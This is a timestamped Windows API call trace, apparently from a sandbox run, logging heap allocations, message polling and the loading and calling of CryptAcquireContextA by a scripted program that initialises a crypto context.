[0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.369] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0259.369] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0259.369] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0259.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.370] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0259.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0259.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0259.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0259.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0259.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0259.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0259.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0259.375] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0259.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0259.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0259.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b88 [0259.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0259.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0259.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0259.375] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0259.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0259.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0259.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0259.376] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0259.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.378] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.379] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.379] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.379] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.379] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.379] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0259.379] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0259.379] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.380] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.380] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 